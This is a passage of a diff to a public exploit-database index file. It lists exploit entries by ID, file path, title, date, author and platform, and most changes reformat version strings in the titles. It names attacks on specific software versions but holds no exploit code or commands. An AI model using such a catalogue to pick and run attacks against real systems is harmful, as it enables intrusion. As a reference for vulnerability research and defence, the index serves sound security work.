Service Vulnerability",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 24108,platforms/php/webapps/24108.txt,"CMS phpshop 2.0 SQL Injection Vulnerability",2013-01-14,"By onestree",php,webapps,0 -24110,platforms/windows/dos/24110.py,"Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability",2013-01-14,"Julien Ahrens",windows,dos,0 -24111,platforms/windows/dos/24111.py,"Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability",2013-01-14,"Julien Ahrens",windows,dos,0 +24110,platforms/windows/dos/24110.py,"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service Vulnerability",2013-01-14,"Julien Ahrens",windows,dos,0 +24111,platforms/windows/dos/24111.py,"Serva 2.0.0 - HTTP Server GET Remote Denial of Service Vulnerability",2013-01-14,"Julien Ahrens",windows,dos,0 24112,platforms/windows/dos/24112.txt,"Microsoft Internet Explorer 6.0 XML Parsing Denial Of Service Vulnerability",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x Exit Routine Access Validation Privilege Escalation Vulnerability",2004-05-11,"Stefan Esser",bsd,local,0 24114,platforms/windows/remote/24114.html,"Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness",2004-05-11,http-equiv,windows,remote,0 @@ -21422,7 +21422,7 @@ id,file,description,date,author,platform,type,port 24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 show_archives.php id Parameter XSS",2004-06-28,DarkBicho,php,webapps,0 24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0 24242,platforms/multiple/dos/24242.java,"Sun Java Runtime Environment 1.4.x Font Object Assertion Failure Denial Of Service Vulnerability",2004-06-28,"Marc Schoenefeld",multiple,dos,0 -24243,platforms/unix/dos/24243.txt,"IBM Lotus Domino Server 6 Web Access Malicious Email View Remote Denial Of Service Vulnerability",2004-06-30,"Andreas Klein",unix,dos,0 +24243,platforms/unix/dos/24243.txt,"IBM Lotus Domino Server 6 - Web Access Remote Denial Of Service Vulnerability",2004-06-30,"Andreas Klein",unix,dos,0 24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 Null Byte XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 Management Interface XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 Cross-Site Scripting Vulnerability",2004-07-20,"Donato Ferrante",multiple,remote,0 @@ -21451,7 +21451,7 @@ id,file,description,date,author,platform,type,port 24269,platforms/php/webapps/24269.txt,"NConf 1.3 (detail.php detail_admin_items.php, id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24272,platforms/multiple/remote/24272.rb,"Jenkins Script-Console Java Execution",2013-01-21,metasploit,multiple,remote,0 -24273,platforms/php/remote/24273.rb,"PHP-Charts v1.0 PHP Code Execution Vulnerability",2013-01-21,metasploit,php,remote,0 +24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution Vulnerability",2013-01-21,metasploit,php,remote,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability",2004-07-12,"sasan hezarkhani",php,webapps,0 24275,platforms/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos,0 24276,platforms/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File Multiple Vulnerabilities",2004-07-13,"Mind Warper",windows,remote,0 @@ -21574,7 +21574,7 @@ id,file,description,date,author,platform,type,port 24393,platforms/php/webapps/24393.txt,"MyDMS 1.4 SQL Injection Vulnerability And Directory Traversal Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial Of Service Vulnerability",2004-08-21,sourvivor,multiple,dos,0 24395,platforms/windows/dos/24395.txt,"Internet Explorer 6.0,Firefox 0.8/0.9.x JavaScript Denial Of Service Vulnerability",2004-08-23,MeFakon,windows,dos,0 -24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite v3 Page.PHP Cross-Site Scripting Vulnerability",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 +24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.PHP Cross-Site Scripting Vulnerability",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 News.mdb Database Disclosure Vulnerability",2004-08-23,"Security .Net Information",asp,webapps,0 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation Vulnerability",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability",2004-08-23,"King Of Love",php,webapps,0 @@ -21609,8 +21609,8 @@ id,file,description,date,author,platform,type,port 24433,platforms/php/webapps/24433.txt,"PHP Weby Directory Software 1.2 Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,metasploit,multiple,remote,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 -24436,platforms/php/webapps/24436.txt,"Kohana Framework v2.3.3 Directory Traversal Vulnerability",2013-01-29,Vulnerability-Lab,php,webapps,0 -24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) Version 7.7.3 Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 +24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal Vulnerability",2013-01-29,Vulnerability-Lab,php,webapps,0 +24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 24438,platforms/php/webapps/24438.txt,"DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability",2013-01-28,EgiX,php,webapps,0 24439,platforms/freebsd/webapps/24439.txt,"PFsense UTM Platform 2.0.1 XSS Vulnerability",2013-01-29,"Dimitris Strevinas",freebsd,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 @@ -21624,7 +21624,7 @@ id,file,description,date,author,platform,type,port 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 (config.php, question parameter) SQL Injection Vulnerability",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 (rev B) Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 -24454,platforms/php/webapps/24454.txt,"Free Monthly Websites v2.0 Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 +24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,metasploit,unix,remote,0 24456,platforms/php/webapps/24456.txt,"Glossword 1.8.12 Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 SQL Injection Vulnerability",2013-02-05,AkaStep,php,webapps,0 @@ -21632,11 +21632,11 @@ id,file,description,date,author,platform,type,port 24459,platforms/linux/dos/24459.sh,"Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0 24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0 24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-12,metasploit,windows,remote,0 -24462,platforms/php/webapps/24462.txt,"Hiverr v2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 +24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0 -24466,platforms/hardware/webapps/24466.txt,"WirelessFiles v1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 +24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer Denial Of Service All Versions",2013-02-10,Jigsaw,windows,dos,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0 @@ -21657,16 +21657,16 @@ id,file,description,date,author,platform,type,port 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability",2013-02-13,LiquidWorm,php,webapps,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX Telnet Authorization Bypass",2013-02-14,"Paul Haas",hardware,remote,23 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)",2013-02-14,"Scott Bell",windows,remote,0 -24496,platforms/windows/webapps/24496.txt,"Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability",2013-02-14,Vulnerability-Lab,windows,webapps,0 -24497,platforms/hardware/webapps/24497.txt,"Transferable Remote v1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 -24498,platforms/hardware/webapps/24498.txt,"OpenPLI v3.0 beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 +24496,platforms/windows/webapps/24496.txt,"Sonicwall Scrutinizer 9.5.2 - SQL Injection Vulnerability",2013-02-14,Vulnerability-Lab,windows,webapps,0 +24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 +24498,platforms/hardware/webapps/24498.txt,"OpenPLI 3.0 beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 24499,platforms/hardware/webapps/24499.txt,"Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 -24500,platforms/windows/webapps/24500.txt,"Sonicwall OEM Scrutinizer v9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 +24500,platforms/windows/webapps/24500.txt,"Sonicwall OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 24501,platforms/php/webapps/24501.txt,"Ultra Light Forum Persistant XSS Vulnerability",2013-02-14,cr4wl3r,php,webapps,0 24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin URL Processing Buffer Overflow",2013-02-14,metasploit,windows,remote,0 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 -24505,platforms/windows/local/24505.py,"Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 +24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - (.pxs) Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"chillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php, L param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 @@ -21678,7 +21678,7 @@ id,file,description,date,author,platform,type,port 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php, cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0 -24517,platforms/hardware/webapps/24517.txt,"USB Sharp v1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 +24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24526,platforms/windows/remote/24526.py,"MS Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 @@ -21696,14 +21696,14 @@ id,file,description,date,author,platform,type,port 24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0 24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 SQL Injection Exploit",2013-02-26,cr4wl3r,php,webapps,0 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0 -24543,platforms/hardware/webapps/24543.txt,"IPMap v2.5 iPad iPhone - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,hardware,webapps,0 +24543,platforms/hardware/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,hardware,webapps,0 24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php, title param) - XSS Vulnerability",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 -24547,platforms/php/remote/24547.rb,"Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 -24548,platforms/php/remote/24548.rb,"Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 +24547,platforms/php/remote/24547.rb,"Kordil EDMS 2.2.60rc3 - Unauthenticated Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 +24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 24549,platforms/php/remote/24549.rb,"PolarPearCms PHP File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 -24550,platforms/hardware/webapps/24550.txt,"WiFilet v1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 +24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0 24552,platforms/php/webapps/24552.txt,"Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0 @@ -21733,7 +21733,7 @@ id,file,description,date,author,platform,type,port 24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 Custchoice.PHP Update Your Password Action Information Disclosure Vulnerability",2004-09-07,masud_libra,php,webapps,0 24583,platforms/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 Customer Statistics Information Disclosure Vulnerability",2004-09-07,masud_libra,php,webapps,0 24584,platforms/windows/remote/24584.c,"Cerulean Studios Trillian Client 0.74 MSN Module Remote Buffer Overflow Vulnerability",2004-09-08,Komrade,windows,remote,0 -24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (v1.3.0) Remote File Include Vulnerability",2004-09-09,"Ahmad Muammar",php,webapps,0 +24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Include Vulnerability",2004-09-09,"Ahmad Muammar",php,webapps,0 24586,platforms/windows/dos/24586.txt,"Gearbox Software Halo Combat Evolved 1.x Game Server Remote Denial Of Service Vulnerability",2004-09-09,"Luigi Auriemma",windows,dos,0 24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 SQL Injection Vulnerability",2004-09-10,Criolabs,php,webapps,0 24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0 @@ -21749,8 +21749,8 @@ id,file,description,date,author,platform,type,port 24598,platforms/multiple/remote/24598.txt,"SnipSnap 0.5.2 HTTP Response Splitting Vulnerability",2004-09-14,"Maestro De-Seguridad",multiple,remote,0 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x UDP Packet Remote Denial Of Service Vulnerability",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 24600,platforms/windows/remote/24600.txt,"MyServer 0.7 Directory Traversal Vulnerability",2004-09-15,scrap,windows,remote,0 -24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (v1.3.0) Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 -24603,platforms/hardware/webapps/24603.txt,"Remote File Manager v1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,hardware,webapps,0 +24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 +24603,platforms/hardware/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,hardware,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0 24606,platforms/linux/local/24606.c,"Sudo 1.6.8 Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0 @@ -21761,8 +21761,8 @@ id,file,description,date,author,platform,type,port 24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 Administrator Command Execution Vulnerability",2004-09-17,"GulfTech Security",cgi,webapps,0 24612,platforms/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 YaBB.pl IMSend Cross-Site Scripting Vulnerability",2004-09-17,"GulfTech Security",cgi,webapps,0 24613,platforms/php/webapps/24613.txt,"ReMOSitory SQL Injection Vulnerability",2004-09-18,khoaimi,php,webapps,0 -24614,platforms/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) XSS",2004-09-20,"Joxean Koret",php,webapps,0 -24615,platforms/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) Function.php Arbitrary Command Execution",2004-09-20,"Joxean Koret",php,webapps,0 +24614,platforms/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - XSS",2004-09-20,"Joxean Koret",php,webapps,0 +24615,platforms/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - Function.php Arbitrary Command Execution",2004-09-20,"Joxean Koret",php,webapps,0 24616,platforms/php/webapps/24616.txt,"TUTOS file_overview.php link_id Parameter SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0 24617,platforms/php/webapps/24617.txt,"TUTOS app_new.php t Parameter XSS",2004-09-20,"Joxean Koret",php,webapps,0 24618,platforms/windows/dos/24618.c,"Impressions Games Lords of the Realm III Nickname Remote Denial Of Service Vulnerability",2004-09-20,"Luigi Auriemma",windows,dos,0 @@ -21774,7 +21774,7 @@ id,file,description,date,author,platform,type,port 24624,platforms/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server Multiple Command Remote Overflow",2004-09-16,D_BuG,windows,remote,0 24625,platforms/asp/webapps/24625.txt,"FreezingCold Broadboard search.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24626,platforms/asp/webapps/24626.txt,"FreezingCold Broadboard profile.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 -24627,platforms/php/webapps/24627.txt,"Qool CMS v2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 +24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 24629,platforms/php/webapps/24629.txt,"CosCms 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0 24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0 @@ -21884,7 +21884,7 @@ id,file,description,date,author,platform,type,port 24738,platforms/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 Remote Denial of Service Vulnerability",2004-11-13,class101,windows,dos,0 24739,platforms/php/webapps/24739.txt,"PowerPortal 1.3 Remote SQL Injection Vulnerability",2004-11-14,ruggine,php,webapps,0 24740,platforms/hardware/webapps/24740.txt,"AirDrive HD 1.6 iPad iPhone - Multiple Vulnerabilities",2013-02-24,Vulnerability-Lab,hardware,webapps,0 -24741,platforms/windows/dos/24741.txt,"TagScanner v5.1 - Stack Buffer Overflow Vulnerability",2013-03-13,Vulnerability-Lab,windows,dos,0 +24741,platforms/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow Vulnerability",2013-03-13,Vulnerability-Lab,windows,dos,0 24742,platforms/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injection Vulnerabilities",2013-03-13,"Saadat Ullah",php,webapps,0 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0 @@ -21951,7 +21951,7 @@ id,file,description,date,author,platform,type,port 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x Local Denial Of Service Vulnerability",2004-12-08,cesaro,multiple,dos,0 24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x Descendancy.PHP Cross-Site Scripting Vulnerability",2004-01-19,JeiAr,php,webapps,0 24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 FSMSH.DLL CGI Application Installation Path Disclosure Vulnerability",2004-12-09,oliver@greyhat.de,windows,remote,0 -24812,platforms/windows/dos/24812.py,"aktiv-player version 2.9.0 Crash PoC",2013-03-15,metacom,windows,dos,0 +24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash PoC",2013-03-15,metacom,windows,dos,0 24813,platforms/linux/remote/24813.pl,"GNU WGet 1.x Multiple Remote Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 Index.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit CD-Key Validation Buffer Overflow Vulnerability",2004-12-10,"Luigi Auriemma",linux,dos,0 @@ -22010,20 +22010,20 @@ id,file,description,date,author,platform,type,port 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 -24872,platforms/windows/local/24872.txt,"Photodex ProShow Producer v5.0.3310 ScsiAccess - Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 +24872,platforms/windows/local/24872.txt,"Photodex ProShow Producer 5.0.3310 ScsiAccess - Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream Buffer Overflow",2013-03-22,metasploit,windows,remote,0 24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 (filemanager.php) - Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 -24879,platforms/php/webapps/24879.txt,"Free Hosting Manager V2.0.2 Multiple SQLi",2013-03-25,"Saadi Siddiqui",php,webapps,0 +24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQLi",2013-03-25,"Saadi Siddiqui",php,webapps,0 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow Vulnerability",2013-03-25,G0li47h,windows,dos,0 24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 (gmembers.php, gid param) - Blind SQL Injection Vulnerability",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 24883,platforms/php/webapps/24883.rb,"""Ra1NX"" PHP Bot pubcall Authentication Bypass Remote Code Execution",2013-03-25,bwall,php,webapps,0 -24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day",2013-03-25,Dr_IDE,windows,local,0 -24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 ActiveX Remote 0-day",2013-03-25,Dr_IDE,windows,local,0 -24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component v3 (ActUWzd.dll (WzTitle)) - Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 +24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0day",2013-03-25,Dr_IDE,windows,local,0 +24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 ActiveX Remote 0day",2013-03-25,Dr_IDE,windows,local,0 +24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) - Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView Log File Parsing Buffer Overflow",2013-03-25,metasploit,windows,remote,0 24888,platforms/linux/remote/24888.rb,"Mutiny Remote Command Execution",2013-03-25,metasploit,linux,remote,0 24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0 @@ -22036,14 +22036,14 @@ id,file,description,date,author,platform,type,port 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 24898,platforms/php/webapps/24898.txt,"SynConnect PMS (index.php, loginid param) - SQL Injection Vulnerability",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 